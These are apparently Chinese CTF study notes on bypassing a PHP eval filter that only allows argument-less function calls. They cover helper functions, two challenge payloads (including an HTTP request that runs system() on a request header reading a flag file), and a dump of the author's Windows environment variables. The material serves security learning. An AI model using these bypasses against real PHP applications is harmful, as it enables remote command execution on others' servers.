无参数RCE
参考:RCE篇之无参数rce - 学安全的小白 - 博客园 (cnblogs.com)
无参数RCE绕过的详细总结(六种方法)_无参数的取反rce-CSDN博客
基础代码
`<?php`
`highlight_file(__FILE__);`
`if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {`
`if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){`
`eval($_GET['star']);`
`}`
`}`简单来说就是对传入的参数正则替换,只要是数字、字母、下划线都会被其换成空
\W==>匹配字母、数字、下划线 等价于A-Za-z0-9_ (?R)?==>递归整个匹配模式
a(b(c()));可以使用,但是`a('b')`或者`a('b','c')`这种含有参数的都不能使用,也不能使用a(b).所以我们要使用无参数的函数进行文件读取或者命令执行
还要考虑的问题是,参数怎么传进去
1.getallheaders()&apache_request_headers
getallheaders()是后者的别称,该函数只能在apache环境下使用
作用:获取全部http请求头信息,以数组的形式返回,可使用var_dump打印出来
2.配合的函数
数组操作类:
current():返回数组当前元素的值
next():数组内部指针指向下一个
prev():数组内部指针指向上一个
reset():数组内部指针指向第一个
each():返回当前元素的键名和键值,并将内部指针向前移动 高版本的php可能已经废除了
end():返回数组的最后一个
implode:建一个一维数组转化成字符串
array_values():返回数组的键值,不返回键名 创建数组需要$a=array("Name"=>"Peter","Age"=>"41","Country"=>"USA");
array_pop():删除数组中的最后一个元素,并返回该元素
array_reverse():
pos():输出数组中的当前元素的值
由于eval、system等函数需要字符串作为参数,所以使用getallheaders()后需要相关函数转换成字符串
文件读取类:
hightlite_file()
shouw_source
readfile()
字符串
strrev():反转给定字符串
3.get_defined_vars()
getallheaders的替换,无限制
返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
<?php
$b = array(1,1,2,3,5,8);
$arr = get_defined_vars();
// 打印 $b
print_r($arr["b"]);
// 打印 PHP 解释程序的路径(如果 PHP 作为 CGI 使用的话)
// 例如:/usr/local/bin/php
echo $arr["_"];
// 打印命令行参数(如果有的话)
print_r($arr["argv"]);
// 打印所有服务器变量
print_r($arr["_SERVER"]);
// 打印变量数组的所有可用键值
print_r(array_keys(get_defined_vars()));
?>输出:
D:\WORK\php-8.3.4-Win32-vs16-x64\php.exe D:\WORK\workstations\PHP\2.php
Array
(
[0] => 1
[1] => 1
[2] => 2
[3] => 3
[4] => 5
[5] => 8
)
Warning: Undefined array key "_" in D:\WORK\workstations\PHP\2.php on line 11
Array
(
[0] => D:\WORK\workstations\PHP\2.php
)
Array
(
[ALLUSERSPROFILE] => C:\ProgramData
[APPCODE_VM_OPTIONS] => D:\jetbra\vmoptions\appcode.vmoptions
[APPDATA] => C:\Users\29210\AppData\Roaming
[CLION_VM_OPTIONS] => D:\jetbra\vmoptions\clion.vmoptions
[CommonProgramFiles] => C:\Program Files\Common Files
[CommonProgramFiles(x86)] => C:\Program Files (x86)\Common Files
[CommonProgramW6432] => C:\Program Files\Common Files
[COMPUTERNAME] => BLAME
[ComSpec] => C:\WINDOWS\system32\cmd.exe
[DATAGRIP_VM_OPTIONS] => D:\jetbra\vmoptions\datagrip.vmoptions
[DATASPELL_VM_OPTIONS] => D:\jetbra\vmoptions\dataspell.vmoptions
[DEVECOSTUDIO_VM_OPTIONS] => D:\jetbra\vmoptions\devecostudio.vmoptions
[DriverData] => C:\Windows\System32\Drivers\DriverData
[EFC_7144] => 1
[FPS_BROWSER_APP_PROFILE_STRING] => Internet Explorer
[FPS_BROWSER_USER_PROFILE_STRING] => Default
[GATEWAY_VM_OPTIONS] => D:\jetbra\vmoptions\gateway.vmoptions
[GOLAND_VM_OPTIONS] => D:\jetbra\vmoptions\goland.vmoptions
[HOMEDRIVE] => C:
[HOMEPATH] => \Users\29210
[IDEA_INITIAL_DIRECTORY] => C:\Users\29210\OneDrive\桌面
[IDEA_VM_OPTIONS] => D:\jetbra\vmoptions\idea.vmoptions
[IGCCSVC_DB] => AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAFF4shdcu3keVHrcD+xdrtwQAAAACAAAAAAAQZgAAAAEAACAAAABZOYDF9s9uJVaEzgp2vfJ/IsyRtMjBKxx6hKUyIGH5uwAAAAAOgAAAAAIAACAAAABpA2/84SajgKBcfZu4s8c3BfYDi5n0eef/r+drcCkxnWAAAAA1JPUfc05KYxYCAHqN3BGUZo7zYdUVWbcV5C+7UhGcfv/6JYtEy+CTeRATYlcFv3Vy3gUQkoQRGcDGzYkoh5/rKoMzGCHNtQFTIjxXxKRv/+iyAgoxU0JzILtaua+vEkFAAAAATUs1PCs/qGm+FFrdGLrVkFyacz4Yd7lkZELI0XTzWjANFlGpH/aMsEFmMR+eG7YFsCZL/k13bXUwZCsLX0+mpQ==
[JAVA_HOME] => D:\WORK\
[JETBRAINSCLIENT_VM_OPTIONS] => D:\jetbra\vmoptions\jetbrainsclient.vmoptions
[JETBRAINS_CLIENT_VM_OPTIONS] => D:\jetbra\vmoptions\jetbrains_client.vmoptions
[LOCALAPPDATA] => C:\Users\29210\AppData\Local
[LOGONSERVER] => \\BLAME
[NUMBER_OF_PROCESSORS] => 16
[OneDrive] => C:\Users\29210\OneDrive
[OneDriveConsumer] => C:\Users\29210\OneDrive
[OS] => Windows_NT
[Path] => D:\WORK\JDK21\bin;C:\Program Files\Common Files\Oracle\Java\javapath;D:\WORK\Python\Scripts\;D:\WORK\Python\;D:\Vmware\bin\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;D:\Unzip\Bandizip\;D:\WORK\Microsoft VS Code\bin;D:\WORK\php-8.3.4-Win32-vs16-x64;D:\WORK\anaconda;D:\WORK\anaconda\Scripts;D:\WORK\anaconda\Library\mingw-w64\bin;D:\WORK\anaconda\Library\usr\bin;D:\WORK\anaconda\Library\bin;D:\Nodejs\;C:\Program Files\Docker\Docker\resources\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Users\29210\AppData\Local\Microsoft\WindowsApps;;D:\WORK\PyCharm Community Edition 2024.1.4\bin;;D:\WORK\IntelliJ IDEA Community Edition 2023.3.4\bin;;D:\Tools\新建文件夹\Nmap;C:\Users\29210\AppData\Local\Programs\Microsoft VS Code\bin;D:\WORK\PhpStorm 2024.1.4\bin;;C:\Users\29210\AppData\Roaming\npm;D:\WORK\javaida\IntelliJ IDEA 2024.1.3\bin;;D:\WORK\PyCharm 2024.1.4\bin;
[PATHEXT] => .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
[PhpStorm] => D:\WORK\PhpStorm 2024.1.4\bin;
[PHPSTORM_VM_OPTIONS] => D:\jetbra\vmoptions\phpstorm.vmoptions
[PROCESSOR_ARCHITECTURE] => AMD64
[PROCESSOR_IDENTIFIER] => Intel64 Family 6 Model 186 Stepping 2, GenuineIntel
[PROCESSOR_LEVEL] => 6
[PROCESSOR_REVISION] => ba02
[ProgramData] => C:\ProgramData
[ProgramFiles] => C:\Program Files
[ProgramFiles(x86)] => C:\Program Files (x86)
[ProgramW6432] => C:\Program Files
[PSModulePath] => C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
[PT8HOME] => D:\Cisco Packet Tracer 8.2.2
[PUBLIC] => C:\Users\Public
[PyCharm] => D:\WORK\PyCharm 2024.1.4\bin;
[PYCHARM_VM_OPTIONS] => D:\jetbra\vmoptions\pycharm.vmoptions
[RIDER_VM_OPTIONS] => D:\jetbra\vmoptions\rider.vmoptions
[RUBYMINE_VM_OPTIONS] => D:\jetbra\vmoptions\rubymine.vmoptions
[SESSIONNAME] => Console
[STUDIO_VM_OPTIONS] => D:\jetbra\vmoptions\studio.vmoptions
[SystemDrive] => C:
[SystemRoot] => C:\WINDOWS
[TEMP] => C:\Users\29210\AppData\Local\Temp
[TERM] => xterm
[TMP] => C:\Users\29210\AppData\Local\Temp
[USERDOMAIN] => BLAME
[USERDOMAIN_ROAMINGPROFILE] => BLAME
[USERNAME] => 29210
[USERPROFILE] => C:\Users\29210
[WEBIDE_VM_OPTIONS] => D:\jetbra\vmoptions\webide.vmoptions
[WEBSTORM_VM_OPTIONS] => D:\jetbra\vmoptions\webstorm.vmoptions
[windir] => C:\WINDOWS
[XiuMaster_v1_button_hotkey] => 16777232
[ZES_ENABLE_SYSMAN] => 1
[PHP_SELF] => D:\WORK\workstations\PHP\2.php
[SCRIPT_NAME] => D:\WORK\workstations\PHP\2.php
[SCRIPT_FILENAME] => D:\WORK\workstations\PHP\2.php
[PATH_TRANSLATED] => D:\WORK\workstations\PHP\2.php
[DOCUMENT_ROOT] =>
[REQUEST_TIME_FLOAT] => 1731328253.109
[REQUEST_TIME] => 1731328253
[argv] => Array
(
[0] => D:\WORK\workstations\PHP\2.php
)
[argc] => 1
)
Array
(
[0] => _GET
[1] => _POST
[2] => _COOKIE
[3] => _FILES
[4] => argv
[5] => argc
[6] => _SERVER
[7] => b
[8] => arr
)
进程已结束,退出代码为 0
4.scandir()
返回指定目录的文件和目录,可以配合getcwd()
当使用print_r(scandir(getcwd()));会返回以下内容
5.localconv()
返回包含本地数字及货币格式信息的数组
[decimal_point] - 小数点字符
[thousands_sep] - 千位分隔符
[int_curr_symbol] - 货币符号 (例如:USD)
[currency_symbol] - 货币符号 (例如:$)
[mon_decimal_point] - 货币小数点字符
[mon_thousands_sep] - 货币千位分隔符
[positive_sign] - 正值字符
[negative_sign] - 负值字符
[int_frac_digits] - 国际通用小数位
[frac_digits] - 本地通用小数位
[p_cs_precedes] - 如果货币符号在一个正数值之前显示,则为 True(1),如果在正数值之后显示,则为 False(0)
[p_sep_by_space] - 如果在货币符号和正数值之间包含空格,则为 True(1),否则为 False(0)
[n_cs_precedes] - 如果货币符号在一个负数值之前显示,则为 True(1),如果在负数值之后显示,则为 False(0)
[n_sep_by_space] - 如果在货币符号和负数值之间包含空格,则为 True(1),否则为 False(0)
[p_sign_posn] - 格式化选项:
0 - 把数量和货币符号写在圆括号内
1 - 在数量和货币符号之前加上 + 号
2 - 在数量和货币符号之后加上 + 号
3 - 直接在货币符号之前加上 + 号
4 - 直接在货币符号之后加上 + 号可以使用返回的第一个点作为代表当前根目录的点
题目
1.2023newstarctf-R!!C!!E!!
<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
eval($_GET['star']);
}
} payload:
为什么参数处理还要一个eval
如果只是一个:eval(array_pop(array_values(getallheaders())))==>system('ls'); 所以还得再加一层才能把语句之形成PHP代码
2.第七届浙江省大学生网络与信息安全竞赛
GET /?code=system(array_pop(array_values(getallheaders()))); HTTP/1.1
a:cat ../f14g.php
Host: 10.1.101.31
Connection: close
Content-Type:aaa
Content-Length: 14
adsfsfdghfghgj
License:
CC BY 4.0